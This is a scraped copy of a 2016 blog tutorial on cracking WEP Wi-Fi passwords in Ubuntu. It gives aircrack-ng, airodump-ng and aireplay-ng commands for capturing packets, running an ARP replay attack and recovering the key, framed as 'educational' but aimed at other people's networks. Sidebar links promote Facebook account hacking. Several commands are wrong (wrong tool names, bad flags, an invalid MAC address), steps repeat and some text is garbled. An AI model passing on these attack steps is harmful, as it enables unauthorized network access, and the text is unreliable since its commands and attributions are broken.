0% found this document useful (0 votes)
301 views4 pages

How To Hack Wifi Passwords in Ubuntu 2016 - TekGyd Best Tech Tips & Tricks, How-To Tutorials

This document provides steps to hack WiFi passwords in Ubuntu. It outlines installing aircrack-ng to crack WEP encrypted networks. The steps include putting the wireless card in monitor mode, scanning for networks, collecting packets using airodump-ng, launching a deauthentication attack with aireplay-ng to get more packets, and using aircrack-ng to crack the password given the captured packets. Proper configuration of wireless modes and collection of network details like BSSID and channel are required before launching attacks to reveal WiFi passwords.

Uploaded by

Rocky Ranjan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
301 views4 pages

How To Hack Wifi Passwords in Ubuntu 2016 - TekGyd Best Tech Tips & Tricks, How-To Tutorials

This document provides steps to hack WiFi passwords in Ubuntu. It outlines installing aircrack-ng to crack WEP encrypted networks. The steps include putting the wireless card in monitor mode, scanning for networks, collecting packets using airodump-ng, launching a deauthentication attack with aireplay-ng to get more packets, and using aircrack-ng to crack the password given the captured packets. Proper configuration of wireless modes and collection of network details like BSSID and channel are required before launching attacks to reveal WiFi passwords.

Uploaded by

Rocky Ranjan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

How To Hack Wi Passwords in Ubuntu 2016

Like 74 Share Share 74 Tweet 2 Share 0 Share

Best wifi hacking tricks 2016 with wifi
hacker method to hack Wifi network in
Ubuntu operating system. Now see the
method to do this in Ubuntu.
For this purpose we are going to use
Ubuntu. First we have to install air­crack program in o.s.

Steps To Hack Wifi Password in Ubuntu (2016)

#1 Install aircrack

For hacking passwords in ubuntu , first we have to install air crack program
in operating system.
­> Install aircrack
     Sudo apt­get install aircrack­ng

­>For rooting , type “su­“ and type your password.

­>Now write the commands in terminal mode:
"iwconfig wlan0 mode monitoring"

Note: Do take notice if any kind of error occurs type “#iwconfig” in a
terminal to check for your wireless.

­>Now scan for a wireless network which will include educational purpose.
Now type commands:
"airdump­ng wlan0"

#2 You need to go in root first. For this purpose type “su –“ and
type your password.

#3 Now type following command in terminal. Code : 
"iwconfig wlan0 mode monitoring"

*Also see* ­ H项�ᡖ� T项� R𥜂顬�项�䀂𥜂𬷿 D𥜂顳�𥜂塖�𥜂㸂 T𥜂𫋿塖� M𥜂㨂㨂圂䄂𥜂㨂 O塕�
Y项�𬷿𬷿 A塕�㸂𬷿项�顬�㸂 Pᡕ�项�塕�𥜂 2016

Note: If some sort of error occurs type “# iwconfig” in a terminal to check
for your wireless.

#4 After that it’s time to scan for a wireless network which we will
compromise with educational purpose. This time we will use the
command:
"airodump­ng wlan0"

#5 Collect information
Once you have created one, abort the process with shortcut key : Ctrl+C.
Now there is a need to collect information about the network. Firstly, copy
the MAC address of the access point which stands for BSSID (example:
00:11:EH:B8:…..). Another point to be noted is to know the channel and it’s
current working. (example: currently working under CH­5). Now , hather
information with airodump­ng. Write the following code:
"airodump­ng­w wep –c 5 –bbsid 00:11:EH:B8:….wlan0"

*Also Read* ­ Top 10 Wifi Hacking Tools In Kali Linux

#6 ARP Reply Attack

Now open another terminal to use ARP Reply Attack which increases the
amount of data packets and gather the initializing vectors or IV of the
chosen access points earlier. Write the following code:
"Aireplay­ng ­3 –b  00:11:EH:B8:….wlan0"

Also Read­: How To Hack Facebook Account Using Android Phones
2016 [*Latest100% working*]

#7 Final Step

Now again move back to the first terminal and have a look at the data
packets. Nearabout 20000 packets have been  collected yet. If it is so,
abort both airodump­ng and aireplay­ng. To decode the key of wireless
76
Shares
network, we are provided with every information.  This all can be done with
aircrack:
74

"aircrack­ng wep­03.cap"
2

If Then there you need any help Must Comment Below Or Message
Us Freely.
 Hack Wi Password. How To Hack Wi Password 2016 Latest Wi Hacking Tricks wi hacking 2016

Author: Bhawik Jain


Mukesh Bhardwaj Is a CEO And Founder of TekGyd . He is young Tech Geek who is
managing iTech Hacks Network Also an aspiring blogger and Chief Editor for
TekGyd.He is an Experienced Blogger,SEO Expert, Digital Marketer,White Hacker
Social Media Expert.

  

RELATED STORIES
Download WiFi Password Hacker Pro For Top 6 Ways To Hack Password
Android (Latest 2016) and Crack it Easily

How To Hack Wi Password In Top 10 Wi Hacking Tools In


Windows ( WPS,WPA2,WPA ) - Kali Linux
Latest Wi Hacking Tricks

Best Tools For Cracking And (Working) Hack WiFi Password


Recovering Password from iPhone (Without Jailbreak)
2016-17

FACEBOOK COMMENT
76
Shares
0 Comments Sort by  Oldest

74

Add a comment...
2

Facebook Comments Plugin

You might also like